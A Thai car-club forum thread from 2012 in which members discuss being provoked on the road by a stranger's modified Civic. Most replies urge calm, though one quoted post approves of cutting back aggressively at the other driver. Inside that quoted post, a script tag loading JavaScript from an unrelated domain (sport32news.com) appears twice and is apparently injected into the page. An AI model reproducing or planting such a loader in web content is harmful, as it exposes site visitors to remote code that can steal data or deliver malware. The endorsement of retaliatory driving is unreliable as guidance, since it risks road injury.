ชื่อเล่น: เด็กครหวัน

เข้าร่วม: 20 กันยา 2011
ตอบ: 54

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 46
ให้คำขอบคุณ: 129

อังคาร, 28 สิงหา 2012 15:58 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
eschocolate พิมพ์ว่า:

ผมว่าไม่น่าใช่คนในคลับแน่ เพราะถ้าใช่และอยากจะทักทายจิง ๆ เราลดกระจกลงมาแล้วยังไม่มีการทักทายก็ชัดเลยครับว่าไม่ใช่ คงเห็นว่าขับรถแต่งและเป็นรุ่นเดียวกัน ก็เลยอยากจะท้าลองอะไรประมาณนี้อะครับ ส่วนตัวผมยังไม่เคยเจอใครมากวน ๆ แบบนี้นะครับ แต่ถ้าเจอแบบนี้ ผมจัดให้มันแน่ครับ ปาดมากเราก็ปาดกลับซัดหายเลยครับ<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

ผมเห็นด้วยนะครับว่าไม่น่าใช่รถคนในคลับ พฤติกรรมแบบนี้ไม่เหมาะสม 
ได้รับคำขอบคุณจาก: FuckTong  dangeroustoy  eschocolate 
mosonic

ชื่อเล่น: โม

เข้าร่วม: 25 พฤษภาคม 2011
ตอบ: 1063

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 551
ให้คำขอบคุณ: 349

ปี: 2005
อังคาร, 28 สิงหา 2012 16:10 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
....  ใจเย็น ๆๆๆ นะคร๊าบ
pja

เข้าร่วม: 21 มีนา 2011
ตอบ: 934

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 707
ให้คำขอบคุณ: 973

อังคาร, 28 สิงหา 2012 16:11 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ใจเย็นๆ กันก็ดีนะคับ
honeybeex7

เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 28 สิงหา 2012 17:20 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
เมื่อเช้านี้...........................

ผมรถติดครับมาสายเลยแสรดดดด  พระราม 6 ไม่เกี่ยวแต่อยากแชร์ 
taeducier

ชื่อเล่น: เต้นะ

เข้าร่วม: 19 มกรา 2010
ตอบ: 1659

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2492
ให้คำขอบคุณ: 248

อังคาร, 28 สิงหา 2012 17:26 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ผมเจอ พวก ES แต่ง แต่ไม่มี URL ก็ รีบ ซัดไปกะกบข้างๆ นำหน้านิดนึง

ให้ เขา มองกระจกเราสะ...หวังว่าวันต่อไป

เขาจะได้เข้ามาเป็น " ครอบครัวเดียวกับเรา "
ได้รับคำขอบคุณจาก: dangeroustoy  pong5674  Nung_Sodapop 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.